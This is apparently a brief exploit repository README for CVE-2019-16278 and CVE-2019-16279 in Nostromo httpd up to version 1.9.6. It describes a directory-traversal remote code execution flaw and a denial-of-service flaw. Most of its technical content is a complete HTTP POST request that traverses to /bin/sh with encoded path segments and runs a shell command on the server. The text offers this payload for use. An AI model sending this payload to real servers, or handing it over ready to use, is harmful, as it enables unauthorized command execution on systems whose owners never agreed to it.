CVE-2019-16278
https://github.com/jas502n/CVE-2019-16278
Exploits for CVE-2019-16278 and CVE-2019-16279
Nostromo httpd is prone to 2 cricital vulnerabilities for versions <= 1.9.6 (0day =]) first one is an RCE through directory transversal, second one is a DoS
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Length: 25 echo echo ifconfig 2>&1